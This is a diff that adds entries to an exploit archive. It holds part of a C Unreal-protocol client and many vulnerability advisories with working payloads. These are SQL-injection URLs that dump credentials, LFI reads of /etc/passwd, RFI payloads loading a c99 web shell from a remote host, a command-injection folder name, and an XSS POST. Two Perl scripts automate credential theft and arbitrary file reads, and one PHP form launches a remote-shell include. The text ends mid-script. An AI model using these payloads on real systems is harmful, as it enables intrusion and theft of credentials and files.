fgets(data, len, stdin); + for(p = data; *p && (*p != '\n') && (*p != '\r'); p++); + *p = 0; +} + + + +int calc_authresp(int num) { + if(challenge_fix == 1) return((num * 178) ^ (num >> 16) ^ (num << 16) ^ 0xfe11ae23); // FFOW + return((num * 237) ^ (num >> 16) ^ (num << 16) ^ 0x93fe92ce); +} + + + +int write_unrnum(int num, u8 *buff, int bits) { + int len; + u8 mini[5]; + + len = write_unreal_index(num, mini); + return(write_bitmem(mini, len, buff, bits)); +} + + + +int read_unrnum(int *num, u8 *buff, int bits) { + u8 mini[5]; + + *num = 0; + read_bitmem(buff, 5, mini, bits); + return(bits + (read_unreal_index(mini, num) << 3)); +} + + + +int write_unrser(int num, u8 *buff, int bits, int max) { // forcompability with core.dll + int b; + + for(b = 1; b && (b < max); b <<= 1) { + bits = write_bits((num & b) ? 1 : 0, 1, buff, bits); + } + return(bits); +} + + + +int read_unrser(int *num, u8 *buff, int bits, int max) { // forcompability with core.dll + int b; + + *num = 0; + for(b = 1; b && (b < max); b <<= 1) { + if(read_bits(1, buff, bits)) *num += b; + bits++; + } + return(bits); +} + + + +u8 *unreal_parse_pck(u8 *buff, int size, int *chall) { + static int retfix = 0, + done = 0; + static u8 str[BUFFSZ]; + int b, + len, + pck; + u8 *p; + + if(force_fix) { + retfix = force_fix - 1; // because then it does retfix++ + force_fix = 0; + } + if(chall) *chall = 0; + + read_unrser(&pck, buff, 0, 0x4000); + if(u3fix) { + switch(pck) { + case 0: b = 52; break; + case 1: b = 67; break; + default: b = 52; break; // doesn't work with all the packets + } + } else if(pariahfix) { + switch(pck) { + case 0: b = 66; break; + case 1: b = 81; break; + default: b = 52; break; // doesn't work with all the packets + } + } else { + switch(pck) { + case 0: b = 67; break; + case 1: b = 82; break; + default: b = 52; break; // doesn't work with all the packets + } + } + if(aafix) b++; + if(rvfix) b++; + if(movfix) b++; + size <<= 3; + + /* correct but not necessary, probably in a future implementation + b -= 12; + b = read_unrser(&len, buff, b, 0x1000); + if((b + len) < size) size = b + len; + */ + + while(b < size) { + b = read_unrnum(&len, buff, b); + if((len < 0) || ((b + (len << 3)) > size) || (len > (sizeof(str) - 1))) break; + if(!done) done++; + b = read_bitmem(buff, len, str, b); + str[len] = 0; + if(verbose) printf("\n %s", str); + if(chall) { + p = strstr(str, "CHALLENGE="); + if(p) { + sscanf(p + 10, hex_challenge ? "%08X" : "%i", chall); + *chall = calc_authresp(*chall); + } + } + if(strstr(str, "FAIL") || strstr(str, "BRAWL") || strstr(str, "UPGRADE")) { + return(str); + } + } + if(!done) { + retfix++; + if(retfix == 1) return("AAFIX"); + if(retfix == 2) return("U3FIX"); + if(retfix == 3) return("RVFIX"); + if(retfix == 4) return("PARIAHFIX"); + if(retfix == 5) return("MOVFIX"); + if(fast_connect) { + retfix = 0; + fast_connect = 0; + return("NOFIX"); + } + printf("\n" + "Error: seems that this game requires a specific compatibility fix\n" + " try to relaunch this tool another time\n" + "\n"); + exit(1); + } + return(NULL); +} + + + +int unreal_build_pck(u8 *buff, int pck, ...) { + va_list ap; + int i, + b, + sl, + len, + bsize, + val3ff, + val8, + val1000; + u8 *s; + + //devastation is not supported, it uses 0x4000 1 1 0x4000 1 1 1 1 0x3ff 0x1000 + + val8 = 0x08; + if(pariahfix) val8 = 0x4; + + val3ff = 0x3ff; + if(aafix) val3ff = 0x800; + if(rvfix) val3ff = 0x50f; // takes the same number of bits of AA... it's useless + + val1000 = 0x1000; + if(movfix) val1000 = 0x1e00; + + b = 0; + b = write_unrser(pck, buff, b, 0x4000); + if(pck == 0) { + b = write_bits(0, 1, buff, b); + b = write_bits(1, 1, buff, b); + b = write_bits(1, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(1, 1, buff, b); + b = write_unrser(0, buff, b, val3ff); + } else if(pck == 1) { + b = write_bits(1, 1, buff, b); + b = write_unrser(0, buff, b, 0x4000); + b = write_bits(0, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(1, 1, buff, b); + b = write_unrser(0, buff, b, val3ff); + } else { // this one is not supported + b = write_bits(1, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_bits(0, 1, buff, b); + b = write_unrser(0, buff, b, val3ff); + } + b = write_unrser(pck + 1, buff, b, 0x400); + b = write_unrser(1, buff, b, val8); // 0 with pck > 1 + bsize = b; + + for(i = 0; i < 2; i++) { // used only for calculating the packet size! it allows to save an additional buffer + va_start(ap, pck); + while((s = va_arg(ap, u8 *))) { + sl = strlen(s) + 1; + if(sl == 1) continue; // skip empty + if(!i && send_verbose) printf("\n^ %s", s); + b = write_unrnum(sl, buff, b); + b = write_bitmem(s, sl, buff, b); // in reality they are index numbers + } + va_end(ap); + + if(!i) b = write_unrser(b - bsize, buff, bsize, val1000); + } + + b = write_bits(1, 1, buff, b); // ??? + + len = b >> 3; + if(b & 7) len++; + if(send_verbose) printf("\n"); + return(len); +} + + + +int read_unreal_index(u8 *index_num, int *ret) { + int len, + result; + u8 b0 = index_num[0], + b1 = index_num[1], + b2 = index_num[2], + b3 = index_num[3], + b4 = index_num[4]; + + if(u3fix) { + *ret = b0 | (b1 << 8) | (b2 << 16) | (b3 << 24); + return(4); + } + + result = 0; + len = 1; + if(b0 & 0x40) { + len++; + if(b1 & 0x80) { + len++; + if(b2 & 0x80) { + len++; + if(b3 & 0x80) { + len++; + result = b4; + } + result = (result << 7) | (b3 & 0x7f); + } + result = (result << 7) | (b2 & 0x7f); + } + result = (result << 7) | (b1 & 0x7f); + } + result = (result << 6) | (b0 & 0x3f); + if(b0 & 0x80) result = -result; + *ret = result; + return(len); +} + + + +int write_unreal_index(int number, u8 *index_num) { + int len, + sign = 1; + + if(u3fix) { + index_num[0] = number & 0xff; + index_num[1] = (number >> 8) & 0xff; + index_num[2] = (number >> 16) & 0xff; + index_num[3] = (number >> 24) & 0xff; + return(4); + } + + if(number < 0) { + number = -number; + sign = -1; + } + + len = 1; + index_num[0] = (number & 0x3f); + if(number >>= 6) { + index_num[0] += 0x40; + index_num[1] = (number & 0x7f); + len++; + if(number >>= 7) { + index_num[1] += 0x80; + index_num[2] = (number & 0x7f); + len++; + if(number >>= 7) { + index_num[2] += 0x80; + index_num[3] = (number & 0x7f); + len++; + if(number >>= 7) { + index_num[3] += 0x80; + index_num[4] = number; + len++; + } + } + } + } + if(sign < 0) index_num[0] += 0x80; + return(len); +} + + + +int read_bitmem(u8 *in, int inlen, u8 *out, int bits) { + for(; inlen--; out++) { + *out = read_bits(8, in, bits); + bits += 8; + } + return(bits); +} + + + +int write_bitmem(u8 *in, int inlen, u8 *out, int bits) { + for(; inlen--; in++) { + bits = write_bits(*in, 8, out, bits); + } + return(bits); +} + + + +int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) { + int retry = 2, + len; + + if(in) { + while(retry--) { + fputc('.', stdout); + if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) + < 0) goto quit; + if(!out) return(0); + if(!timeout(sd, 2)) break; + } + } else { + if(timeout(sd, 3) < 0) retry = -1; + } + + if(retry < 0) { + if(!err) return(-2); + printf("\nError: socket timeout, no reply received\n\n"); + exit(1); + } + + fputc('.', stdout); + len = recvfrom(sd, out, outsz, 0, NULL, NULL); + if(len < 0) goto quit; + return(len); +quit: + if(err) std_err(); + return(-1); +} + + + +int timeout(int sock, int secs) { + struct timeval tout; + fd_set fd_read; + + tout.tv_sec = secs; + tout.tv_usec = 0; + FD_ZERO(&fd_read); + FD_SET(sock, &fd_read); + if(select(sock + 1, &fd_read, NULL, NULL, &tout) + <= 0) return(-1); + return(0); +} + + + +u32 resolv(char *host) { + struct hostent *hp; + u32 host_ip; + + host_ip = inet_addr(host); + if(host_ip == INADDR_NONE) { + hp = gethostbyname(host); + if(!hp) { + printf("\nError: Unable to resolv hostname (%s)\n", host); + exit(1); + } else host_ip = *(u32 *)hp->h_addr; + } + return(host_ip); +} + + + +#ifndef WIN32 + void std_err(void) { + perror("\nError"); + exit(1); + } +#endif + + + diff --git a/platforms/multiple/remote/32084.txt b/platforms/multiple/remote/32084.txt new file mode 100755 index 000000000..aa080ba7d --- /dev/null +++ b/platforms/multiple/remote/32084.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/30290/info + +The SmbClientParser Perl module is prone to a remote command-execution vulnerability because it fails to sufficiently sanitize user-supplied data. + +Successfully exploiting this issue will allow an attacker to execute arbitrary commands with the privileges of the user running applications that use the module. + +Filesys::SmbClientParser 2.7 is vulnerable; other versions may also be affected. + +Name a folder the following: +' x && xterm &# + +A shared folder containing this named folder will execute the following command: +/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "'x && xterm &#"' -D "/poc" \ No newline at end of file diff --git a/platforms/php/webapps/31989.txt b/platforms/php/webapps/31989.txt new file mode 100755 index 000000000..5d3a00173 --- /dev/null +++ b/platforms/php/webapps/31989.txt @@ -0,0 +1,26 @@ +# ============================================================== +# Title ...| SQL Injection in webERP +# Version .| 4.11.3 +# Date ....| 28.02.2014 +# Found ...| HauntIT Blog +# Home ....| http://www.weberp.org +# ============================================================== + + +# ============================================================== +# SQL Injection + +------ +POST /k/cms/erp/webERP/SalesInquiry.php HTTP/1.1 +Host: 10.149.14.62 +(...) +Content-Length: 391 + +FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01%2F02%2F2014&ToDate=28%2F02%2F2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy= FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&DateType=Order&InvoiceType=All&FromDate=01/02/2014&ToDate=28/02/2014&PartNumberOp=Equals&PartNumber=&DebtorNoOp=Equals&DebtorNo=&DebtorNameOp=LIKE&DebtorName=&OrderNo=&LineStatus=All&Category=All&Salesman=All&Area=All&SortBy='TADAAAM;]&SummaryType=orderno&submit=Run Inquiry&SummaryType=orderno&submit=Run+Inquiry +------ + + +# ============================================================== +# More @ http://HauntIT.blogspot.com +# Thanks! ;) +# o/ \ No newline at end of file diff --git a/platforms/php/webapps/32075.txt b/platforms/php/webapps/32075.txt new file mode 100755 index 000000000..082e84503 --- /dev/null +++ b/platforms/php/webapps/32075.txt @@ -0,0 +1,71 @@ +Advisory ID: HTB23202 +Product: OpenDocMan +Vendor: Free Document Management Software +Vulnerable Version(s): 1.2.7 and probably prior +Tested Version: 1.2.7 +Advisory Publication: February 12, 2014 [without technical details] +Vendor Notification: February 12, 2014 +Vendor Patch: February 24, 2014 +Public Disclosure: March 5, 2014 +Vulnerability Type: SQL Injection [CWE-89], Improper Access Control [CWE-284] +CVE References: CVE-2014-1945, CVE-2014-1946 +Risk Level: High +CVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +------------------------------------------------------------------------ +----------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application. + +1) SQL Injection in OpenDocMan: CVE-2014-1945 + +The vulnerability exists due to insufficient validation of "add_value" HTTP GET parameter in "/ajax_udf.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. + +The exploitation example below displays version of the MySQL server: + +http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,v +ersion%28%29,3,4,5,6,7,8,9 + +2) Improper Access Control in OpenDocMan: CVE-2014-1946 + +The vulnerability exists due to insufficient validation of allowed action in "/signup.php" script when updating userâ??s profile. A remote authenticated attacker can assign administrative privileges to the current account and gain complete control over the application. + +The exploitation example below assigns administrative privileges for the current account: + +
+ + + + +
+ +------------------------------------------------------------------------ +----------------------- + +Solution: + +Update to OpenDocMan v1.2.7.2 + +More Information: +http://www.opendocman.com/opendocman-v1-2-7-1-release/ +http://www.opendocman.com/opendocman-v1-2-7-2-released/ + +------------------------------------------------------------------------ +----------------------- + +References: + +[1] High-Tech Bridge Advisory HTB23202 - https://www.htbridge.com/advisory/HTB23202 - Multiple vulnerabilities in OpenDocMan. +[2] OpenDocMan - http://www.opendocman.com/ - Open Source Document Management System written in PHP. +[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. +[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. +[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. + +------------------------------------------------------------------------ +----------------------- + +Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \ No newline at end of file diff --git a/platforms/php/webapps/32076.txt b/platforms/php/webapps/32076.txt new file mode 100755 index 000000000..e5a23e625 --- /dev/null +++ b/platforms/php/webapps/32076.txt @@ -0,0 +1,64 @@ +Advisory ID: HTB23203 +Product: Ilch CMS +Vendor: http://ilch.de +Vulnerable Version(s): 2.0 and probably prior +Tested Version: 2.0 +Advisory Publication: February 12, 2014 [without technical details] +Vendor Notification: February 12, 2014 +Public Disclosure: March 5, 2014 +Vulnerability Type: Cross-Site Scripting [CWE-79] +CVE Reference: CVE-2014-1944 +Risk Level: Medium +CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +------------------------------------------------------------------------ +----------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered vulnerability in Ilch CMS, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users and administrators of vulnerable application. + +1) Cross-Site Scripting (XSS) in Ilch CMS: CVE-2014-1944 + +The vulnerability exists due to insufficient sanitisation of user-supplied data in "text" HTTP POST parameter passed to "/index.php/guestbook/index/newentry" URL. A remote unauthenticated user can send a specially crafted HTTP POST request, which allows to permanently inject and execute arbitrary HTML and script code in userâ??s browser in context of the vulnerable website when the victim visits the "http://[host]/index.php/guestbook/index/index" URL. + +The exploitation example below uses the JavaScript "alert()" function to display "immuniweb" word: + +POST /index.php/guestbook/index/newentry HTTP/1.1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 151 + +ilch_token=5a528778359d4756b9b8803b48fba18b&name=name&email=email%40emai +l.com&homepage=http%3A%2F%2Fsite.com&text=&password=a&B1=Submit \ No newline at end of file diff --git a/platforms/php/webapps/32078.php b/platforms/php/webapps/32078.php new file mode 100755 index 000000000..41730add6 --- /dev/null +++ b/platforms/php/webapps/32078.php @@ -0,0 +1,41 @@ +source: http://www.securityfocus.com/bid/30275/info + +Community CMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. + +Community CMS 0.1 is vulnerable; other versions may also be affected. + +> +*[+] +*[+] +*[+] [ Persian Boys Hacking Team ] -:- 2008 -:- IRAN +*[+] - +*[+] - discovered by N3TR00T3R [at] Y! [dot] com +*[+] - communitycms-0.1 Remote File Includion +*[+] - download :http://sourceforge.net/project/showf...roup_id=223968 +*[+] - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph +3r,shayan_cmd +*[+] r00t.master,Dr.root,Pouya_server,Spyn3t,LordKouros h,123qwe,mr.n4ser +*[+] Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ... +*[+] +************************************************** ********************/ +#if register_globals = On; + +$shell="http://localhost/syn99.php?"; // your shell +$target="http://localhost/communitycms/include.php"; //vul page ---> +include.php +echo" + +
+SECURITY : +SHELL : + + + +
+ +"; +?> diff --git a/platforms/php/webapps/32079.txt b/platforms/php/webapps/32079.txt new file mode 100755 index 000000000..6151fd485 --- /dev/null +++ b/platforms/php/webapps/32079.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30284/info + +CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +CreaCMS 1 is vulnerable; other versions may also be affected. + +http://www.example.com/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://127.0.0.1/c99.php? \ No newline at end of file diff --git a/platforms/php/webapps/32080.txt b/platforms/php/webapps/32080.txt new file mode 100755 index 000000000..ee6a46a1a --- /dev/null +++ b/platforms/php/webapps/32080.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30284/info + +CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +CreaCMS 1 is vulnerable; other versions may also be affected. + +http://www.example.com/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://127.0.0.1/c99.php? \ No newline at end of file diff --git a/platforms/php/webapps/32081.txt b/platforms/php/webapps/32081.txt new file mode 100755 index 000000000..d19286d1a --- /dev/null +++ b/platforms/php/webapps/32081.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30285/info + +Lemon CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks. + +Lemon CMS 1.10 is vulnerable; other versions may also be affected. + +http://www.example.com/lemon_includes/FCKeditor/editor/filemanager/browser/browser.php?dir=../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/32082.txt b/platforms/php/webapps/32082.txt new file mode 100755 index 000000000..04ea622c1 --- /dev/null +++ b/platforms/php/webapps/32082.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30289/info + +Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Def_Blog 1.0.3 is vulnerable; other versions may also be affected. + +http://www.example.com/[def_blog_path]/comaddok.php?article=-1+union+select+1,concat(pseudo,0x3a3a,mdp)+from+def_user-- \ No newline at end of file diff --git a/platforms/php/webapps/32083.txt b/platforms/php/webapps/32083.txt new file mode 100755 index 000000000..6d0c50c10 --- /dev/null +++ b/platforms/php/webapps/32083.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30289/info + +Def_Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Def_Blog 1.0.3 is vulnerable; other versions may also be affected. + +http://www.example.com/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user-- \ No newline at end of file diff --git a/platforms/php/webapps/32085.txt b/platforms/php/webapps/32085.txt new file mode 100755 index 000000000..94d56efed --- /dev/null +++ b/platforms/php/webapps/32085.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30292/info + +phpFreeChat is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +phpFreeChat 1.1 is vulnerable; other versions may also be affected. + +http://www.example.com/path/demo/demo21_with_hardcoded_urls.php/>'> \ No newline at end of file diff --git a/platforms/php/webapps/32087.txt b/platforms/php/webapps/32087.txt new file mode 100755 index 000000000..a491d852d --- /dev/null +++ b/platforms/php/webapps/32087.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/30304/info + +EasyBookMarker is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +EasyBookMarker 4.0tr is vulnerable; other versions may also be affected. + +
\ No newline at end of file diff --git a/platforms/php/webapps/32088.pl b/platforms/php/webapps/32088.pl new file mode 100755 index 000000000..04a29f5d3 --- /dev/null +++ b/platforms/php/webapps/32088.pl @@ -0,0 +1,210 @@ +source: http://www.securityfocus.com/bid/30305/info + +EasyDynamicPages is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +EasyDynamicPages 3.0tr is vulnerable; other versions may also be affected. + + +#!/usr/bin/perl +#---------------------------------------------------------------- +# +#Script : Easydynamicpages 30tr +# +#Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File +Disclosure Exploit ) +# +#Variable Method : GET +# +#Alert : High +# +#---------------------------------------------------------------- +# +#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash +# +#My Offical Website : HTTP://FEREIDANI.IR +# +#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com +# +#---------------------------------------------------------------- +# +#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR +# +#---------------------------------------------------------------- +# +#Script Download : +http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip +# +#---------------------------------------------------------------- +# +#Xss 1 : +http://Example/staticpages/easycalendar/index.php?PageSection=1&month=4&year= +# +#---------------------------------------------------------------- +# +#SQL Injection : +# +#SQL 1 : +http://Example/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/* +# +# +#---------------------------------------------------------------- +# +# Tnx : God +# +# HTTP://IRCRASH.COM +# +#---------------------------------------------------------------- + + +use LWP; +use HTTP::Request; +use Getopt::Long; + + + + +sub header +{ +print " +**************************************************** +* Easydynamicpages 30tr Exploit * +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +****************************************************"; +} + +sub usage +{ + print " +* Usage : perl $0 http://Example/ +**************************************************** +"; +} + + +$url = ($ARGV[0]); + +if(!$url) +{ +header(); +usage(); +exit; +} +if($url !~ /\//){$url = $url."/";} +if($url !~ /http:\/\//){$url = "http://".$url;} +sub xpl1() +{ +$vul = +"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*"; +$requestpage = $url.$vul; + + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + +@password = split(/Password:/,$content); +$password = @password[1]; +@password = split(//,$password); +$password = @password[0]; + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +print "\n Username: ".$name."\n\n"; +print " Password: " .$password."\n\n"; + + +} + + +#XPL2 + +sub xpl2() +{ +print "\n Example For File Address : /home/user/public_html/config.php\n +Or /etc/passwd"; +print "\n Enter File Address :"; +$fil3 = ; + +$vul = +"/dynamicpages/index.php?page=individual&table=edp_Help_Internal_News&read=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*"; +$requestpage = $url.$vul; + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +open (FILE, ">".source.".txt"); +print FILE $name; +close (FILE); +print " File Save In source.txt\n"; +print ""; + +} + +#XPL2 END +#Starting; +print " +**************************************************** +* Easydynamicpages 30tr Exploit * +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +**************************************************** +* Mod Options : * +* Mod 1 : Find mysql username and root password * +* Mod 2 : Save PHP config source in your system * +****************************************************"; +print "\n \n Enter Mod : "; +$mod=; +if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } +else { print "\n Unknown Mod ! \n Exploit Failed !"; }; +if ($mod=="1") { xpl1(); }; +if ($mod=="2") { xpl2(); }; diff --git a/platforms/php/webapps/32089.pl b/platforms/php/webapps/32089.pl new file mode 100755 index 000000000..7fdf7e5cb --- /dev/null +++ b/platforms/php/webapps/32089.pl @@ -0,0 +1,203 @@ +source: http://www.securityfocus.com/bid/30307/info + +EasyPublish is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The issues include SQL-injection and cross-site scripting vulnerabilities. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +EasyPublish 3.0tr is vulnerable; other versions may also be affected. + +NOTE: This BID was originally titled 'EasyPublish Multiple Input Validation Vulnerabilities', but has been changed to better describe the issues. + +#!/usr/bin/perl +#---------------------------------------------------------------- +# +#Script : EasyPublish 3.0tr +# +#Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) +# +#Variable Method : GET +# +#Alert : High +# +#---------------------------------------------------------------- +# +#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash +# +#My Official Website : HTTP://FEREIDANI.IR +# +#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com +# +#---------------------------------------------------------------- +# +#Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR +# +#---------------------------------------------------------------- +# +#Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip +# +#---------------------------------------------------------------- +# +#Xss 1 : http://Example//staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_News&read=% +# +#---------------------------------------------------------------- +# +#SQL Injection : +# +#SQL 1 : http://Example/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;-- +# +# +#---------------------------------------------------------------- +# +# Tnx : God +# +# HTTP://IRCRASH.COM +# +#---------------------------------------------------------------- + + +use LWP; +use HTTP::Request; +use Getopt::Long; + + + + +sub header +{ +print " +**************************************************** +* EasyPublish 3.0tr Exploit * +**************************************************** +*Discovered by : Khashayar Fereidani * +*Exploited by : Khashayar Fereidani * +*My Official Website : http://fereidani.ir * +****************************************************"; +} + +sub usage +{ + print " +* Usage : perl $0 http://Example/ +**************************************************** +"; +} + + +$url = ($ARGV[0]); + +if(!$url) +{ +header(); +usage(); +exit; +} +if($url !~ /\//){$url = $url."/";} +if($url !~ /http:\/\//){$url = "http://".$url;} +sub xpl1() +{ +$vul = "/staticpages/easypublish/index.php?PageSection=0&table=edp_News&page=individual&fage=search&read=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*"; +$requestpage = $url.$vul; + + +my $req = HTTP::Request->new("POST",$requestpage); +$ua = LWP::UserAgent->new; +$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); +#$req->referer($url); +$req->referer("IRCRASH.COM"); +$req->content_type('application/x-www-form-urlencoded'); +$req->header("content-length" => $contlen); +$req->content($poststring); + +$response = $ua->request($req); +$content = $response->content; +$header = $response->headers_as_string(); + +@name = split(/Login:/,$content); +$name = @name[1]; +@name = split(//,$name); +$name = @name[0]; + +@password = split(/Password:/,$content); +$password = @password[1]; +@password = split(//,$password); +$password = @password[0]; + +if(!$name && !$password) +{ +print "\n\n"; +print "!Exploit failed ! :(\n\n"; +exit; +} + +print "\n Username: ".$name."\n\n"; +print " Password: " .$password."\n\n"; + + +} + + +#XPL2 + +sub xpl2() +{ +print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd"; +print "\n Enter File Address :"; +$fil3 = ; + +$vul = 